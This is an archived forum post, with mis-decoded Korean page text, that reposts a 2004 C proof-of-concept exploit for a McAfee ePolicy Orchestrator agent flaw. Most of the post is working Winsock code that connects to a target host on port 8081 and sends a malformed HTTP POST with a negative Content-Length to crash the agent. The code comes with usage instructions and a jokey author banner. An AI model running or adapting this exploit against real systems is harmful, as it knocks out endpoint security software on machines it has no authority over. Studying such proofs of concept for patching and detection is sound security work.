BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡

±Û¾´ÀÌ: ¸Æ McAfee ePolicy Orchestrator Agent Á¶È¸¼ö: 6578


/*

>McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement
Vulnerability PoC

>Ref : http://securityfocus.com/bid/9476
>discovered by : cyber_flash@hotmail.com


"
The McAfee ePolicy Orchestrator agent has been reported to a buffer
management vulnerability that may be exploited to crash the affected
agent. Although unconfirmed, it has
been reported that the issue may also allow a remote attacker to trigger
a buffer overflow vulnerability.

The issue reportedly presents itself, because certain values in HTTP POST
headers processed by the ePolicy Orchestrator are not sufficiently
sanitized.

"


>Hi NA-eye ;-) . Hurry-yup . relase a patch guyz !


+ PoC by Shashank Pandey a.k.a
G0D_0F_z10N +

> Greetz to my dewd 'Arun Jose' for 'Grass is not addictive..thing' while
i wuz writing this..!

> lame coding ..dont think too much abt it...



*/


#include <windows.h>
#include <winsock.h>
#include <stdio.h>

#pragma comment (lib,"ws2_32")





int main(int argc, char *argv[])
{


WSADATA wsaData;




int s;

struct hostent *yo;
struct sockaddr_in wutever;

char badb0y[] =

"POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0
HTTP/1.0\r\n"
"Accept: application/octet-stream\r\n"
"Accept-Language: en-us\r\n"
"Content-Type: application/octet-stream\r\n"
"User-Agent: Godzilla/6.9 (compatible; SPIPE/3.0;
Windows)\r\n"
"Host: EPO_DIE\r\n"
"Content-Length: -1\r\n"
"Connection: Keep-Alive\r\n\r\n";

printf("\n--------------------------------- ");
printf("\n McAfee ePO agent overflow PoC \n");
printf("+++++++++++++++++++++++++++++++++\n");
printf(" by Shashank Pandey \n");
printf(" (reach_shash@linuxmail.org) \n");
printf("--------------------------------- \n");



if(WSAStartup(0x0101,&wsaData)!=0) {
printf("Error :Cudn't initiate winsock!");
return 0;
}


if(argc<2)

{printf("\nUsage : %s <I.P./Hostname>\n\n",argv[0]);
exit(0);}




if ( (yo = gethostbyname(argv[1]))==0)
{
printf("error: can't resolve '%s'",argv[1]);
return 1;
}





wutever.sin_port = htons(8081); // ePO agent uses the HTTP protocol to
communicate on port 8081
wutever.sin_family = AF_INET;
wutever.sin_addr = *((struct in_addr *)yo->h_addr);

if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return 1;
}


if ((connect(s, (struct sockaddr *) &wutever, sizeof(wutever))) == -1){
printf("Error:Cudn't Connect\r\n");
return 1;
}



printf("\r\nCrashing the client...< it's a PoC dewd ;-) >\n");

send(s,badb0y,strlen(badb0y),0);



closesocket(s);


WSACleanup();





return 1;
}


°ü·Ã±Û : ¾øÀ½ ±Û¾´½Ã°£ : 2004/02/04 21:17 from 61.82.164.84

  Windows Kernel bug ¸ñ·Ïº¸±â »õ±Û ¾²±â Áö¿ì±â ÀÀ´ä±Û ¾²±â ±Û ¼öÁ¤ wu-ftpd version 2.6.2  
BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡